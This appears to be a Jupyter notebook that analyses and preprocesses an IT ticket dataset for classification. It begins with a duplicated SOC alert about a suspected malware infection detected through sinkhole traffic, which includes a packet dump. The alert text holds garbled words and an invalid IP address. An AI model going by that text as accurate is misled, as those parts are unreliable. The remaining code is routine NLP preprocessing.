soc\r\n\r\n\r\n=========================\r\ntechnical details\r\n=========================\r\nthe domain name system (dns) is a hierarchical naming system for any resource connected to the internet or a private network which has the primary purpose of associating various information with domain names assigned to each of the participating entities. it is primarily used for translating domain names to the numerirtcal ip addresses for the purpose of locating service and devices on a network. \r\n\r\nthe domain name system distributes the responsibility of assigning domain names and mapping those names to ip addresses by designating authoritative name servers for each domain. authoritative name servers are assigned to be responsible for their supported domains, and may delegate authority over subdomains to other name servers. the domain name system also specifies the technical functionality of this database service. it defines the dns protocol, a detailed specification of the data structures and data communication exchanges used in dns, as part of the internet protocol suite.\r\n\r\ndns sinkholes are dns servers that give out incorrect information in order to prevent the use of the domain name for which ip address resolution is being attempted. when a client requests to resolve the address of a sinkholed hole or domain, the sinkhole returns a non-routable address or any address except for the real address. this germanytially denies the client a connection to the target host. using this method, compromised clients can easily be found using sinkhole logs. another method of detecting compromised hosts is during operations in which servers being used for c2 (command and control) purposes are taken over by law enforcement as part of a malware mitigation effort. traffic to a sinkhole should be examined for characteristics of automated activity. in some cases, an administrator may be curious about a particular domain and browse to it, triggering the signature. repeated automated requests to a sinkhole are a clear indication of infection by a trojan of some sort.\r\n\r\nconnections to sinkholes may seem somewhat benign, but the ramdntyifications certainly include information leakage to some extent. although sinkhole operators are unlikely to use any personally identifiable information they may capture from a trojan's communication, it may become public knowledge that "company x is infected with y", which may lead to reputational damage.\r\n\r\nadditionally, some sinkholes are feeding ip addresses of victims to beshryulists, which may impede access to certain services, like sending email. finally, some trojans may connect to multiple controller domains/hostnames, and even though some of them may be sinkholed, there may be others that are not, leading to the possibility of remote code execution or information leakage to malicious parties in some cases. \r\n\r\n\r\n=========================\r\nreferences\r\n=========================\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n=========================\r\nevent data\r\n=========================\r\nrelated events: \r\n___________________________________________________________________________\r\nevent id: 303133902\r\nevent summary: 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset\r\nlog time: 2016-08-04 at 10:59:36\r\nsource ip: 195.38.137.100\r\ndestination ip: 61.01.52.02617\r\ndestination hostname: lpawx210968sf\r\ndevice ip: 10.32.100.17\r\ndevice name: isensor03.company.com\r\nevent extra data:\r\nsherlockruleid = 699417\r\ncvss = -1\r\nctainstanceid = 0\r\nirreceivedtime = 1470308771682\r\nhttpstatuscode = 302\r\ninspectoreventid = 028504841\r\neventtypepriority = 4\r\ndstassetofinterest = 416\r\nglobalproxycorrelationurl = null\r\nforeseeinternalip = 61.01.52.02617\r\nlogtimestamp = 2582520598\r\nforeseeconndirection = incoming\r\nforeseeexternalip = 195.38.137.100\r\ninlineaction = 2\r\nontologyid = 200020003203753900\r\nforeseesrcipgeo = franhtyufurt am main,deu\r\neventtypeid = 200020003203560456\r\ndsthostname = lpawx210968sf\r\nvendoreventid = 271147\r\nvendorpriority = 2\r\ntcpflags = ***ap***\r\nproto = tcp\r\ndstport = 3720\r\naction = not blocked\r\nileatdatacenter = true\r\nforeseemaliciouscomment = null or empty model found;evaluationmodels->ngm:0.1987:0.004;\r\nhttpcontenttype = text/html\r\nvendorversion = 7\r\nrefererproxycorrelationurl = null\r\nagentid = 102805\r\nsrcport = 80\r\n\r\n\r\noccurrence count: 7\r\nevent count: 1\r\n\r\nevent detail:\r\n[**] [1:21162804:2] 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset [**]\r\n[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]\r\n[sensor id: 602982][event id: 271147][time: 2582520598.52167]\r\n[src ip: 195.38.137.100][dst ip: 61.01.52.02617][sport/itype: 80][dport/icode: 3720][proto: 6]\r\n08/04/2016-10:59:36.052167 195.38.137.100:80 -> 61.01.52.02617:3720\r\ntcp ttl:45 tos:0x0 id:52866 iplen:20 dgmlen:386 df\r\n***ap*** seq: 0xf1729be0 ack: 0xcc94106 win: 0x687f tcplen: 20\r\n==pcap 1==\r\n\r\n\r\n[ex http_uri 9: /]\r\n\r\n[ex http_hostname 10: futureinterest.org]\r\n\r\n[o:security]\r\n\r\nascii packet(s):\r\n==pcap 1 ascii s==\r\n.......w............e.....@.-..c.&.d.,j..p...r....a.p.h.....http/1.1.302.moved.temporarily..server:.nginx..date:.thu,.04.aug.2016.10:59:36.gmt..content-type:.text/html..transfer-encoding:.chunked..connection:.close..location:.|12.161.199.50|2582520598|2582520598|0|1|0..set-cookie:.snkz=12.161.199.50....0....\r\n==pcap 1 ascii e==\r\n\r\nhex packet(s):\r\n==pcap 1 hex s==\r\n000000 0c00 0000 1820 a357 c7cb 0000 8201 0000 .......w........\r\n000010 8201 0000 4500 0182 ce82 4000 2d06 dc63 ....e.....@.-..c\r\n000020 c326 8964 0a2c 4ad9 0050 0e88 f172 9be0 .&.d.,j..p...r..\r\n000030 0cc9 4106 5018 687f e100 0000 4854 5450 ..a.p.h.....http\r\n000040 2f31 2e31 2033 3032 204d 6f76 6564 2054 /1.1.302.moved.t\r\n000050 656d 706f 7261 7269 6c79 0d0a 5365 7276 emporarily..serv\r\n000060 6572 3a20 6e67 696e 780d 0a44 6174 653a er:.nginx..date:\r\n000070 2054 6875 2c20 3034 2041 7567 2032 3031 .thu,.04.aug.201\r\n000080 3620 3130 3a35 393a 3336 2047 4d54 0d0a 6.10:59:36.gmt..\r\n000090 436f 6e74 656e 742d 5479 7065 3a20 7465 content-type:.te\r\n0000a0 7874 2f68 746d 6c0d 0a54 7261 6e73 6665 xt/html..transfe\r\n0000b0 722d 456e 636f 6469 6e67 3a20 6368 756e r-encoding:.chun\r\n0000c0 6b65 640d 0a43 6f6e 6e65 6374 696f 6e3a ked..connection:\r\n0000d0 2063 6c6f 7365 0d0a 4c6f 6361 7469 6f6e .close..location\r\n0000e0 3a20 6874 7470 3a2f 2f73 736f 2e61 6e62 :.\r\n0000f0 7472 2e63 6f6d 2f64 6f6d 6169 6e2f 6675 tr.com/domain/fu\r\n000100 7475 7265 696e 7465 7265 7374 2e6f 7267 tureinterest.org\r\n000110 0d0a 5365 742d 436f 6f6b 6965 3a20 6274 ..set-cookie:.bt\r\n000120 7374 3d66 6561 3834 3465 3066 3735 3966 st=fea844e0f759f\r\n000130 6430 3931 3065 3566 3865 3463 6266 3665 d0910e5f8e4cbf6e\r\n000140 6430 397c 3132 2e31 3631 2e31 3939 2e35 d09|12.161.199.5\r\n000150 307c 3134 3730 3330 3833 3736 7c31 3437 0|2582520598|147\r\n000160 3033 3038 3337 367c 307c 317c 300d 0a53 1419487|0|1|0..s\r\n000170 6574 2d43 6f6f 6b69 653a 2073 6e6b 7a3d et-cookie:.snkz=\r\n000180 3132 2e31 3631 2e31 3939 2e35 300d 0a0d 12.161.199.50...\r\n000190 0a30 0d0a 0d0a .0....\r\n==pcap 1 hex e== 1346
7995 source ip : 61.01.52.02617\r\nsystem name : lpawx210968sf\r\nuser name: n/a\r\nlocation : indaituba\r\nsep , sms status : n/a\r\nfield sales user ( yes / no) : no\r\ndsw event log: see below\r\n\r\n**\r\n\r\n=========================\r\nincident overview\r\n=========================\r\nwe are seeing your 10.32.100.17/isensor03.company.com device generating '51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset' alerts for traffic (not blocked) from port 80/tcp of 195.38.137.100 to port 3720/tcp of your lpawx210968sf/61.01.52.02617 device indicating that the host is most likely infected with malware. \r\n\r\nthis return traffic indicates that lpawx210968sf/61.01.52.02617 has most likely attempted to visit a domain name which is being sinkholed. dns sinkholes are dns servers that give out false information in order to prevent the use of the domain for which ip address resolution has been requested. sinkhole traffic is a possible indicator of an infected computer that is reaching out to a controller that has been taken over by a law enforcement or research organization as part of a malware mitigation effort. traffic to a sinkhole should be examined for characteristics of automated activity. in some cases, an administrator may be curious about a particular domain and browse to it, triggering the signature. repeated automated requests to a sinkhole, however, are a clear indication of a malware infection.\r\n\r\nwe are escalating this incident to you via a high priority ticket per our default escalation policies. if you would like us to handle these incidents differently in the future (see below for handling options), or if you have any further questions or concerns, please let us know either by corresponding to us via this ticket and delegating the ticket back to the soc, or by calling us at . \r\n1) ticket only escalation for sinkhole domain alerts (explicit notification via a medium priority ticket (no phone call))\r\n2) auto-resolve sinkhole domain alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)\r\n\r\nsincerely,\r\nsecureworks soc\r\n\r\n\r\n=========================\r\ntechnical details\r\n=========================\r\nthe domain name system (dns) is a hierarchical naming system for any resource connected to the internet or a private network which has the primary purpose of associating various information with domain names assigned to each of the participating entities. it is primarily used for translating domain names to the numerirtcal ip addresses for the purpose of locating service and devices on a network. \r\n\r\nthe domain name system distributes the responsibility of assigning domain names and mapping those names to ip addresses by designating authoritative name servers for each domain. authoritative name servers are assigned to be responsible for their supported domains, and may delegate authority over subdomains to other name servers. the domain name system also specifies the technical functionality of this database service. it defines the dns protocol, a detailed specification of the data structures and data communication exchanges used in dns, as part of the internet protocol suite.\r\n\r\ndns sinkholes are dns servers that give out incorrect information in order to prevent the use of the domain name for which ip address resolution is being attempted. when a client requests to resolve the address of a sinkholed hole or domain, the sinkhole returns a non-routable address or any address except for the real address. this germanytially denies the client a connection to the target host. using this method, compromised clients can easily be found using sinkhole logs. another method of detecting compromised hosts is during operations in which servers being used for c2 (command and control) purposes are taken over by law enforcement as part of a malware mitigation effort. traffic to a sinkhole should be examined for characteristics of automated activity. in some cases, an administrator may be curious about a particular domain and browse to it, triggering the signature. repeated automated requests to a sinkhole are a clear indication of infection by a trojan of some sort.\r\n\r\nconnections to sinkholes may seem somewhat benign, but the ramdntyifications certainly include information leakage to some extent. although sinkhole operators are unlikely to use any personally identifiable information they may capture from a trojan's communication, it may become public knowledge that "company x is infected with y", which may lead to reputational damage.\r\n\r\nadditionally, some sinkholes are feeding ip addresses of victims to beshryulists, which may impede access to certain services, like sending email. finally, some trojans may connect to multiple controller domains/hostnames, and even though some of them may be sinkholed, there may be others that are not, leading to the possibility of remote code execution or information leakage to malicious parties in some cases. \r\n\r\n\r\n=========================\r\nreferences\r\n=========================\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n=========================\r\nevent data\r\n=========================\r\nrelated events: \r\n___________________________________________________________________________\r\nevent id: 303133902\r\nevent summary: 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset\r\nlog time: 2016-08-04 at 10:59:36\r\nsource ip: 195.38.137.100\r\ndestination ip: 61.01.52.02617\r\ndestination hostname: lpawx210968sf\r\ndevice ip: 10.32.100.17\r\ndevice name: isensor03.company.com\r\nevent extra data:\r\nsherlockruleid = 699417\r\ncvss = -1\r\nctainstanceid = 0\r\nirreceivedtime = 1470308771682\r\nhttpstatuscode = 302\r\ninspectoreventid = 028504841\r\neventtypepriority = 4\r\ndstassetofinterest = 416\r\nglobalproxycorrelationurl = null\r\nforeseeinternalip = 61.01.52.02617\r\nlogtimestamp = 2582520598\r\nforeseeconndirection = incoming\r\nforeseeexternalip = 195.38.137.100\r\ninlineaction = 2\r\nontologyid = 200020003203753900\r\nforeseesrcipgeo = franhtyufurt am main,deu\r\neventtypeid = 200020003203560456\r\ndsthostname = lpawx210968sf\r\nvendoreventid = 271147\r\nvendorpriority = 2\r\ntcpflags = ***ap***\r\nproto = tcp\r\ndstport = 3720\r\naction = not blocked\r\nileatdatacenter = true\r\nforeseemaliciouscomment = null or empty model found;evaluationmodels->ngm:0.1987:0.004;\r\nhttpcontenttype = text/html\r\nvendorversion = 7\r\nrefererproxycorrelationurl = null\r\nagentid = 102805\r\nsrcport = 80\r\n\r\n\r\noccurrence count: 7\r\nevent count: 1\r\n\r\nevent detail:\r\n[**] [1:21162804:2] 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset [**]\r\n[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]\r\n[sensor id: 602982][event id: 271147][time: 2582520598.52167]\r\n[src ip: 195.38.137.100][dst ip: 61.01.52.02617][sport/itype: 80][dport/icode: 3720][proto: 6]\r\n08/04/2016-10:59:36.052167 195.38.137.100:80 -> 61.01.52.02617:3720\r\ntcp ttl:45 tos:0x0 id:52866 iplen:20 dgmlen:386 df\r\n***ap*** seq: 0xf1729be0 ack: 0xcc94106 win: 0x687f tcplen: 20\r\n==pcap 1==\r\n\r\n\r\n[ex http_uri 9: /]\r\n\r\n[ex http_hostname 10: futureinterest.org]\r\n\r\n[o:security]\r\n\r\nascii packet(s):\r\n==pcap 1 ascii s==\r\n.......w............e.....@.-..c.&.d.,j..p...r....a.p.h.....http/1.1.302.moved.temporarily..server:.nginx..date:.thu,.04.aug.2016.10:59:36.gmt..content-type:.text/html..transfer-encoding:.chunked..connection:.close..location:.|12.161.199.50|2582520598|2582520598|0|1|0..set-cookie:.snkz=12.161.199.50....0....\r\n==pcap 1 ascii e==\r\n\r\nhex packet(s):\r\n==pcap 1 hex s==\r\n000000 0c00 0000 1820 a357 c7cb 0000 8201 0000 .......w........\r\n000010 8201 0000 4500 0182 ce82 4000 2d06 dc63 ....e.....@.-..c\r\n000020 c326 8964 0a2c 4ad9 0050 0e88 f172 9be0 .&.d.,j..p...r..\r\n000030 0cc9 4106 5018 687f e100 0000 4854 5450 ..a.p.h.....http\r\n000040 2f31 2e31 2033 3032 204d 6f76 6564 2054 /1.1.302.moved.t\r\n000050 656d 706f 7261 7269 6c79 0d0a 5365 7276 emporarily..serv\r\n000060 6572 3a20 6e67 696e 780d 0a44 6174 653a er:.nginx..date:\r\n000070 2054 6875 2c20 3034 2041 7567 2032 3031 .thu,.04.aug.201\r\n000080 3620 3130 3a35 393a 3336 2047 4d54 0d0a 6.10:59:36.gmt..\r\n000090 436f 6e74 656e 742d 5479 7065 3a20 7465 content-type:.te\r\n0000a0 7874 2f68 746d 6c0d 0a54 7261 6e73 6665 xt/html..transfe\r\n0000b0 722d 456e 636f 6469 6e67 3a20 6368 756e r-encoding:.chun\r\n0000c0 6b65 640d 0a43 6f6e 6e65 6374 696f 6e3a ked..connection:\r\n0000d0 2063 6c6f 7365 0d0a 4c6f 6361 7469 6f6e .close..location\r\n0000e0 3a20 6874 7470 3a2f 2f73 736f 2e61 6e62 :.\r\n0000f0 7472 2e63 6f6d 2f64 6f6d 6169 6e2f 6675 tr.com/domain/fu\r\n000100 7475 7265 696e 7465 7265 7374 2e6f 7267 tureinterest.org\r\n000110 0d0a 5365 742d 436f 6f6b 6965 3a20 6274 ..set-cookie:.bt\r\n000120 7374 3d66 6561 3834 3465 3066 3735 3966 st=fea844e0f759f\r\n000130 6430 3931 3065 3566 3865 3463 6266 3665 d0910e5f8e4cbf6e\r\n000140 6430 397c 3132 2e31 3631 2e31 3939 2e35 d09|12.161.199.5\r\n000150 307c 3134 3730 3330 3833 3736 7c31 3437 0|2582520598|147\r\n000160 3033 3038 3337 367c 307c 317c 300d 0a53 1419487|0|1|0..s\r\n000170 6574 2d43 6f6f 6b69 653a 2073 6e6b 7a3d et-cookie:.snkz=\r\n000180 3132 2e31 3631 2e31 3939 2e35 300d 0a0d 12.161.199.50...\r\n000190 0a30 0d0a 0d0a .0....\r\n==pcap 1 hex e== 1346

Analyzing Caller Column

Check the number of unique callers in the dataset

In [0]:
#Removing space between Caller Full Name to count unique callers
tickets_corpus['Caller']= tickets_corpus['Caller'].replace(" ","", regex=True)
Unique_Callers= tickets_corpus['Caller'].str.split(expand=True).stack().value_counts()
print ('Number of Unique callers in the Dataset', len(tickets_corpus['Caller'].str.split(expand=True).stack().value_counts()))
Number of Unique callers in the Dataset 2948

Lets see the top 10 callers in raising tickets

In [0]:
top_callers = tickets_corpus.groupby(['Caller']).size().nlargest(10)
print(top_callers)
Caller
bpctwhsnkzqsbmtp    810
ZkBogxibQsEJzdZO    151
fumkcsjisarmtlhy    134
rbozivdqgmlhrtvp     87
rkupnshbgsmzfojw     71
jloygrwhacvztedi     64
spxqmiryzpwgoqju     63
oldrctiubxurpsyi     57
olckhmvxpcqobjnd     54
dkmcfreganwmfvlg     51
dtype: int64

Only one caller has raised 810 tickets, rest of the callers are raised only < 200 tickets

Lets check if any caller raised the tickets for multiple groups

In [0]:
top_c = tickets_corpus['Caller'].groupby(tickets_corpus['Assignment group']).value_counts()
grp_caller =pd.DataFrame(top_c.groupby(level=0).nlargest(5).reset_index(level=0, drop=True))
multy_caller = grp_caller[grp_caller.Caller.duplicated()]
grp_caller.head(20)
Out[0]:
Caller
Assignment group Caller
GRP_0 fumkcsjisarmtlhy 132
rbozivdqgmlhrtvp 86
olckhmvxpcqobjnd 54
efbwiadpdicafxhv 45
mfeyoulindobtzpw 13
GRP_1 bpctwhsnkzqsbmtp 6
jloygrwhacvztedi 4
jyoqwxhzclhxsoqy 3
spxqmiryzpwgoqju 3
kbnfxpsygehxzayq 2
GRP_10 bpctwhsnkzqsbmtp 60
ihfkwzjderbxoyqk 6
dizquolfhlykecxa 5
gnasmtvxcwxtsvkm 3
hlrmufzxqcdzierm 3
GRP_11 ctvaejbomjcerqwo 7
tghrloksjbgcvlmf 2
vlymsnejwhlqxcst 2
dnwfhpylzqbldipk 1
fbgetcznjlsvxura 1
In [0]:
multy_caller_unique = [idx[1] for idx in multy_caller.index[multy_caller.Caller.unique()]]
multy_caller_unique
Out[0]:
['hlrmufzxqcdzierm',
 'fbgetcznjlsvxura',
 'gnasmtvxcwxtsvkm',
 'ihfkwzjderbxoyqk',
 'tqfnalpjqyoscnge',
 'fmqubnvskcxpeyiv',
 'tghrloksjbgcvlmf',
 'jwqyxbzsadpvilqu',
 'nuhfwpljojcwxser',
 'oldrctiubxurpsyi',
 'vlymsnejwhlqxcst',
 'dkmcfreganwmfvlg',
 'bpctwhsnkzqsbmtp',
 'spxqmiryzpwgoqju',
 'obanjrhgrnafleys']

The above callers have raised tickets for multiple groups.

As per our above analysis, we dont see any significance relationship between the 'Caller' and group to which tickets are assigned. so for the model building, we may can avoid this column

Visualization

Visualizing the Frequency of words in Description

In [22]:
init_notebook_mode(connected=True)

all_words = tickets_corpus['Description'].str.split(expand=True).unstack().value_counts()
data = [go.Bar(
            x = all_words.index.values[2:50],
            y = all_words.values[2:50],
            marker= dict(colorscale='Viridis',
                         color = all_words.values[2:100]
                        ),
            text='Word counts'
    )]

layout = go.Layout(
    title='Frequent Occuring word (unclean) in Description'
)

fig = go.Figure(data=data, layout=layout)

iplot(fig, filename='basic-bar')

Visualizing the Frequency of words in Short description

In [23]:
all_words = tickets_corpus['Short description'].str.split(expand=True).unstack().value_counts()
data = [go.Bar(
            x = all_words.index.values[2:50],
            y = all_words.values[2:50],
            marker= dict(colorscale='Viridis',
                         color = all_words.values[2:100]
                        ),
            text='Word counts'
    )]

layout = go.Layout(
    title='Frequent Occuring word (unclean) in Short Description'
)

fig = go.Figure(data=data, layout=layout)

iplot(fig, filename='basic-bar')

Distribution of tickets by the Group

In [0]:
plt.figure(figsize=(20,12))
tickets_corpus["Assignment group"].value_counts().plot.pie(autopct='%1.2f%%', fontsize=10, startangle=90)
Out[0]:
<matplotlib.axes._subplots.AxesSubplot at 0x136c6ca50>

From the above plot we can see that 46.73% of the data is for GRP_0

Some importany insights from the above plot- group 0,8,24, 12, 9, 2, 19 have highest number of cases tagged. Data is highly biased towards GRP_0 incidents

Short Description Word count visualization

In [0]:
ax = tickets_corpus.hist(column='short_des_word_count', bins=25, grid=False, figsize=(8,6), color='#86bf91', zorder=2, rwidth=0.9)
ax = ax[0]
for x in ax:
    # Set x-axis label
    x.set_xlabel("Short Description word count", labelpad=20, weight='bold', size=12)
    # Set y-axis label
    x.set_ylabel("Count", labelpad=20, weight='bold', size=12)

Description word count visualization

In [0]:
ax = tickets_corpus.hist(column='Des_word_count', bins=25, grid=False, figsize=(8,6), color='#86bf91', zorder=2, rwidth=0.9)
ax = ax[0]
for x in ax:
    # Set x-axis label
    x.set_xlabel("Description Word count", labelpad=20, weight='bold', size=12)
    # Set y-axis label
    x.set_ylabel("Count", labelpad=20, weight='bold', size=12)
    x.set_title("Description word count")

Lets visualize no.of tickets in each Assignment group.

In [0]:
plt.figure(figsize=(22,10))
sns.set_style("whitegrid")
sns.countplot("Assignment group",data=tickets_corpus)
plt.xticks(rotation=90)
plt.title("Frequency of Assignment groups",fontsize=20)
plt.xlabel("Assignment groups",fontsize=8)
plt.ylabel("No.of tickets",fontsize=8)
Out[0]:
Text(0, 0.5, 'No.of tickets')

Let's merge the 'Short description' and 'Description' columns before preprocessing.

In [0]:
tickets_corpus.columns
Out[0]:
Index(['Short description', 'Description', 'Caller', 'Assignment group',
       'short_desc_len', 'short_des_word_count', 'Desc_len', 'Des_word_count'],
      dtype='object')
In [0]:
# Merge the Short descrition and Description column texts to create a new column
tickets_corpus.insert(loc=8, 
              column='ticket_summary', 
              allow_duplicates=True, 
              value=list(tickets_corpus['Short description'].str.strip() + ' ' + tickets_corpus['Description'].str.strip()))
In [0]:
#check the merged column is created properly or not
tickets_corpus['ticket_summary'].head()
Out[0]:
0    login issue -verified user details.(employee# & manager name)\r\n-checked the user name in ad and reset the password.\r\n-advised the user to login and check.\r\n-caller confirmed that he was able to login.\r\n-issue resolved.
1                     outlook received from: hmjdrvpb.komuaywn@gmail.com\r\n\r\nhello team,\r\n\r\nmy meetings/skype meetings etc are not appearing in my outlook calendar, can somebody please advise how to correct this?\r\n\r\nkind
2                                                                                                                     cant log in to vpn received from: eylqgodm.ybqkwiam@gmail.com\r\n\r\nhi\r\n\r\ni cannot log on to vpn\r\n\r\nbest
3                                                                                                                                                                           unable to access hr_tool page unable to access hr_tool page
4                                                                                                                                                                                                               skype error skype error
Name: ticket_summary, dtype: object

Let's analyse the non-english data present in the dataset.

In [0]:
tickets_corpus['Language'] = tickets_corpus['ticket_summary'].apply(detect)
In [0]:
# validating the languages present in the 'text' column using google language detection package.
print ('Various languages detected includes', tickets_corpus.groupby(['Language']).size())
print ('Total number of records with multiple languages detected is', len(tickets_corpus['Language']))
print ('Other than english langauge records are', tickets_corpus[~tickets_corpus['Language'].str.contains("en", na=False)].count())
Various languages detected includes Language
af     272
ca      51
cs       3
cy       6
da      72
de     380
en    7060
es      49
et       4
fi       4
fr     110
hr       4
hu       2
id       5
it     136
lt       2
nl      73
no      84
pl      30
pt      23
ro      12
sk       1
sl       5
so       2
sq      10
sv      74
tl      12
tr       5
dtype: int64
Total number of records with multiple languages detected is 8491
Other than english langauge records are Short description       1431
Description             1431
Caller                  1431
Assignment group        1431
short_desc_len          1431
short_des_word_count    1431
Desc_len                1431
Des_word_count          1431
ticket_summary          1431
Language                1431
dtype: int64

Total 28 languages present in the dataset, majority is english, dutuch, african and french.Around 1393 records are of other langauge out of total 7647 records. As of now , we have not handling these data.

Preprocessing

preprocessing the text simply means to bring your text into a form that is predictable and analyzable.
There are different ways to preprocess your text. Here are some of the approaches we followed:

  • Converting to lowercase
  • Text cleaning to remove unneccesary tags
  • Removing punctuation
  • Removing stopwords
  • Convertion of ascented characters
  • Lemmatization

Convert to lowercase

In [0]:
tickets_corpus['ticket_summary'] = tickets_corpus['ticket_summary'].apply(lambda x: str(x).lower())

Text Cleaning: Removing unwanted characters, special symbols, and tags.

In [0]:
def getList():
    """To prepare a list having all unneccessary tags,special characters and not useful words in our data."""
    rmvList = []
    rmvList += ['received from:(.*)']  # received data line
    rmvList += ['From:(.*)']  # from line
    rmvList += ['Sent:(.*)']  # sent to line
    rmvList += ['To:(.*)']  # to line
    rmvList += ['CC:(.*)']  # cc line
    rmvList += ['https?:[^\]\n\r]+']  # https & http
    rmvList += ['[\r\n]']  # for \r\n
    rmvList += ['[^a-zA-Z\s]']
    rmvList += ['sid_']
    rmvList += ['erp ']
    return rmvList

def cleanDataset(col, rmvList):
    """Function to clean the dataset by calling getList() function"""
    for ex in rmvList:
        col = col.str.replace(ex.lower(), '')
    return col
In [11]:
#just check for one sample
tickets_corpus.loc[[21]]['ticket_summary']
Out[11]:
21    vpn issue received from: ugephfta.hrbqkvij@gma...
Name: ticket_summary, dtype: object
In [12]:
print(cleanDataset(tickets_corpus.loc[[21]]['ticket_summary'], getList()))
21    vpn issue hello helpdeski am not able to conne...
Name: ticket_summary, dtype: object
In [0]:
#Lets apply Cleaning to entire data 
tickets_corpus['ticket_summary'] = cleanDataset(tickets_corpus['ticket_summary'], getList())
In [14]:
tickets_corpus['ticket_summary'].head()
Out[14]:
0    login issue verified user detailsemployee  man...
1    outlook hello teammy meetingsskype meetings et...
2      cant log in to vpn hii cannot log on to vpnbest
3    unable to access hrtool page unable to access ...
4                              skype error skype error
Name: ticket_summary, dtype: object

Removing Punctuatons
Removed punctuation as it can become a hindrance to the following preprocessing steps.

In [0]:
# !"#$%&\'()*+,-./:;<=>?@[\\]^_{|}~`
PUNCT_TO_REMOVE = string.punctuation
def remove_punctuation(text):
    """custom function to remove the punctuation"""
    return str(text).translate(str.maketrans('', '', PUNCT_TO_REMOVE))

tickets_corpus["ticket_summary"] = tickets_corpus["ticket_summary"].apply(lambda text: remove_punctuation(text))

Removing Stopwords
Stopwords are very common words. Words like “we” and “are” probably do not help at all in NLP tasks such as sentiment analysis or text classifications. Hence, we can remove stopwords to save computing time and efforts in processing large volumes of text.We have used stopwords from nltk and extended with more words depends on the corpus

In [16]:
#we are using stopwords from nltk
nltk.download('stopwords')
[nltk_data] Downloading package stopwords to /root/nltk_data...
[nltk_data]   Unzipping corpora/stopwords.zip.
Out[16]:
True

Extending stopwords according to our corpus and removing all stopwords from data

In [17]:
STOPWORDS = stopwords.words('english')
STOPWORDS.extend(["sr", "psa", "perpsr", "psa", "good", "evening", "will", "night", "afternoon","png", "mailto" "ca","nt","at" "i", "vip", "llv", "xyz", 
                  "cid", "image", "gmail","co", "in", "com", "ticket", "company", "received", "0o", "0s", "3a", "3b", "3d", "6b", "6o", "a", "A", "a1", "a2", 
                  "a3", "a4", "ab", "able", "about", "above", "abst", "ac", "accordance", "according", "accordingly", "across", "act", "actually", "ad",
                  "added", "adj", "ae", "af", "affected", "affecting", "after", "afterwards", "ag", "again", "against", "ah", "ain", "aj", "al", "all", 
                  "allow", "allows", "almost", "alone", "along", "already", "also", "although", "always", "am", "among", "amongst", "amoungst", "amount", 
                  "an", "and", "announce", "another", "any", "anybody", "anyhow", "anymore", "anyone", "anyway", "anyways", "anywhere", "ao", "ap", "apart", 
                  "apparently", "appreciate", "approximately", "ar", "are", "aren", "arent", "arise", "around","articl", "as", "aside", "ask", "asking", "at", "au",
                  "auth", "av", "available", "aw", "away", "awfully", "ax", "ay", "az", "b", "B", "b1", "b2", "b3", "ba", "back", "bc", "bd", "be", "became", 
                  "been", "before", "beforehand", "beginnings", "behind", "below", "beside", "besides", "best", "between", "beyond", "bi", "bill", "biol", 
                  "bj", "bk", "bl", "bn", "both", "bottom", "bp", "br", "brief", "briefly", "bs", "bt", "bu", "but", "bx", "by", "c", "C", "c1", "c2", "c3", 
                  "ca", "call", "came", "can", "cc", "cd", "ce", "certain", "certainly", "cf", "cg", "ch", "ci", "cit", "cj", "cl", "clearly", "cm", "cn",
                  "co", "com", "come", "comes", "con", "concerning", "consequently", "consider", "considering", "could", "couldn", "couldnt", "course", 
                  "cp", "cq", "cr", "cry", "cs", "ct", "cu", "cv", "cx", "cy", "cz", "d", "D", "d2", "da", "date", "dc", "dd", "de", "definitely",
                  "describe", "described", "despite", "detail", "df", "di", "did", "didn", "dj", "dk", "dl", "do", "does", "doesn", "doing", "don", 
                  "done", "down", "downwards", "dp", "dr", "ds", "dt", "du", "due", "during", "dx", "dy", "e", "E", "e2", "e3", "ea", "each", "ec", 
                  "ed", "edu", "ee", "ef", "eg", "ei", "eight", "eighty", "either", "ej", "el", "eleven", "else", "elsewhere", "em", "en", "end", "ending",
                  "enough", "entirely", "eo", "ep", "eq", "er", "es", "especially", "est", "et", "et-al", "etc", "eu", "ev", "even", "ever", "every",
                  "everybody", "everyone", "everything", "everywhere", "ex", "exactly", "example", "except", "ey", "f", "F", "f2", "fa", "far", "fc", "few",
                  "ff", "fi", "fifteen", "fifth", "fify", "fill", "find", "fire", "five", "fix", "fj", "fl", "fn", "fo", "followed", "following", "follows",
                  "for", "former", "formerly", "forth", "forty", "found", "four", "fr", "from", "front", "fs", "ft", "fu", "full", "further", "furthermore", 
                  "fy", "g", "G", "ga", "gave", "ge", "get", "gets", "getting", "gi", "give", "given", "gives", "giving", "gj", "gl", "go", "goes", "going", 
                  "gone", "got", "gotten", "gr", "greetings","greeting", "gs", "gy", "h", "H", "h2", "h3", "had", "hadn", "happens", "hardly", "has", "hasn", "hasnt",
                  "have", "haven", "having", "he", "hed", "hi","hello", "help", "hence", "here", "hereafter", "hereby", "herein", "heres", "hereupon", "hes", 
                  "hh", "hi", "hid", "hither", "hj", "ho", "hopefully", "how", "howbeit", "however", "hs", "http", "hu", "hundred", "hy", "i2", "i3", "i4",
                  "i6", "i7", "i8", "ia", "ib", "ibid", "ic", "id", "ie", "if", "ig", "ignored", "ih", "ii", "ij", "il", "im", "immediately", "in", 
                  "inasmuch", "inc", "indeed", "index", "indicate", "indicated", "indicates", "information", "inner", "insofar", "instead", "interest",
                  "into", "inward", "io", "ip", "iq", "ir", "is", "isn", "it", "itd", "its", "iv", "ix", "iy", "iz", "j", "J", "jj", "jr", "js", 
                  "jt", "ju", "just", "k", "K", "ke", "keep", "keeps", "kept", "kg", "kj", "km", "ko", "l", "L", "l2", "la", "largely", "last", 
                  "lately", "later", "latter", "latterly", "lb", "lc", "le", "least", "les", "less", "lest", "let", "lets", "lf", "like", "liked",
                  "likely", "line", "little", "lj", "ll", "ln", "lo", "look", "looking", "looks", "los", "lr", "ls", "lt", "ltd", "m", "M", "m2", 
